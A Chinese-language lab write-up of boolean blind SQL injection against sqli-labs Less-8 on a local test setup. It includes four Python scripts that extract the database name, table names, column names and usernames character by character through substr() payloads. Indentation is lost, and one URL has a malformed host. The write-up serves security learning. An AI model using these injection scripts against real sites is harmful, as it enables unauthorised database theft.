第八关布尔注入
这里是使用phpstudy快速搭建的环境
把sqli文件放在www下就能有环境了
判断闭合字符,为’原因’恒正确恒错误做了回显
判断数据库个数为5个
判断第一个数据库长度,为18
获取数据名字第一个字母举个例子
这里随后的东西重复性,都是求多少,求长度,求名,还是向普通sql注入一样,数据库表字段数据这个步骤注入
由于布尔注入麻烦直接使用python脚本(爆数据库和表我借鉴的随后爆字段和爆信息是我自己改的)
这里要使用,就改下ip地址就行
借鉴作者:白塔河冲浪手
原理:http://127.0.0.1/sqli/less-8/?id=1' and substr(database(),%d,1)='字母' -- +
##sql盲注 长度为8
import requests
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.00.1/sqli/Less-8/?id=1' and substr(database(),%d,1)='%s'" %(j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i
print(name)
break
print('database_name:',name)
原理:http://127.0.0.1/sqli/less-8/?id=1' and substr((select table_name from information_schema.tables where tables_schema=security limit 变量,1),变量位,1 )='变量位'" %(k,j,i)
//
##sql盲注 四个表 长度为最大为8
import requests
name = ''
for k in range(0,5):
for j in range(1,10):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'" %(k,j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i
print(name)
break
print('table_name:',name)
///user表有三个字段,字段长度最大为8
import requests
name = ''
for k in range(0,4):
for j in range(1,10):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit %d,1),%d,1)='%s'" %(k,j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i
print(name)
break
print('column_name:',name)
//这里直接查找securiity中users表中username文件
import requests
name = ''
for k in range(0,14):
for j in range(1,10):
for i in '1234sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select username from security.users limit %d,1),%d,1)='%s' -- +" %(k,j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i
print(name)
break
print('column_name:',name)